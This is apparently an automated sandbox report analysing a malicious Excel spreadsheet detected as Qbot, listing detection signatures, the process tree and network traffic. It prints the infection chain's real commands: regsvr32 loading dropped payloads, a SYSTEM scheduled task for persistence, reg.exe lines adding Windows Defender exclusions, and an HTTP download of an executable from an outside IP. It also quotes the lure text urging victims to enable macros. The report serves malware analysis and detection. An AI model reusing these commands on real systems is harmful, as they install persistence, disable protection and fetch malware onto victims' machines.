Loading ...

Play interactive tourEdit tour

Windows Analysis Report Compensation-2100058996-09272021.xls

Overview

General Information

Sample Name:Compensation-2100058996-09272021.xls
Analysis ID:492061
MD5:4658146f947ea498baaf9cf542ad0fc5
SHA1:7e5ff8360eba1e466a301e0e562574ae333f7a89
SHA256:7113398b5e27483757f79c346d4357014e972bb103d0fc8cc03ab2641d51eb8d
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2588 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1516 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1636 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 684 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 408 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2712 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1256 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 1848 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1016 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2552 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2836 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Iaoaukbfna' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 3056 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 152 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Compensation-2100058996-09272021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.727158282.0000000010001000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000007.00000002.978062440.00000000000E0000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
        0000000E.00000002.978045308.00000000000C0000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          0000000D.00000002.725678165.0000000000210000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            00000006.00000002.715078031.0000000010001000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.regsvr32.exe.210000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                7.2.explorer.exe.e0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  14.2.explorer.exe.c0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    7.2.explorer.exe.e0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      6.2.regsvr32.exe.890000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        Click to see the 1 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2588, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1516
                        Sigma detected: Regsvr32 Command Line Without DLLShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1516, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1636

                        Persistence and Installation Behavior:

                        barindex
                        Sigma detected: Schedule system processShow sources
                        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 684, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37, ProcessId: 408

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\Drezd.redVirustotal: Detection: 12%Perma Link
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].datJoe Sandbox ML: detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.715260428.0000000002671000.00000004.00000001.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000EAEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,

                        Software Vulnerabilities:

                        barindex
                        Document exploit detected (drops PE files)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44467.4314974537[1].dat.0.drJump to dropped file
                        Document exploit detected (process start blacklist hit)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
                        Source: Joe Sandbox ViewIP Address: 190.14.37.178 190.14.37.178
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 08:22:32 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44467.4314974537.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: GET /44467.4314974537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: regsvr32.exe, 00000006.00000002.714305693.0000000002130000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.978572746.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.726210160.0000000000D40000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: regsvr32.exe, 00000005.00000002.715638462.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.713507850.0000000001E30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.716290296.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.717086982.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.727982832.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.725827526.0000000000940000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                        Source: regsvr32.exe, 00000006.00000002.714305693.0000000002130000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.978572746.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.726210160.0000000000D40000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].datJump to behavior
                        Source: global trafficHTTP traffic detected: GET /44467.4314974537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive

                        System Summary:

                        barindex
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                        Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
                        Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
                        Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
                        Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
                        Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
                        Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
                        Office process drops PE fileShow sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].datJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        PE file has nameless sectionsShow sources
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F6EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F2346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F1758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F4FC0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A242A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1424
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A2C41
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1D89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1000
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008AB114
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A4495
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1827
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A34DA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1C5D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A32EB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A4162
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3073
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D6EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D2346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D1758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D4FC0
                        Source: Compensation-2100058996-09272021.xlsOLE, VBA macro line: Sub auto_open()
                        Source: Compensation-2100058996-09272021.xlsOLE, VBA macro line: Sub auto_close()
                        Source: Compensation-2100058996-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
                        Source: Compensation-2100058996-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
                        Source: Drezd.red.14.drStatic PE information: No import functions for PE file found
                        Source: Drezd.red.7.drStatic PE information: No import functions for PE file found
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0'
                        Source: Compensation-2100058996-09272021.xlsOLE indicator, VBA macros: true
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Drezd.red 17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................H............&Y.....(.P.....|...............t...............................................................................
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
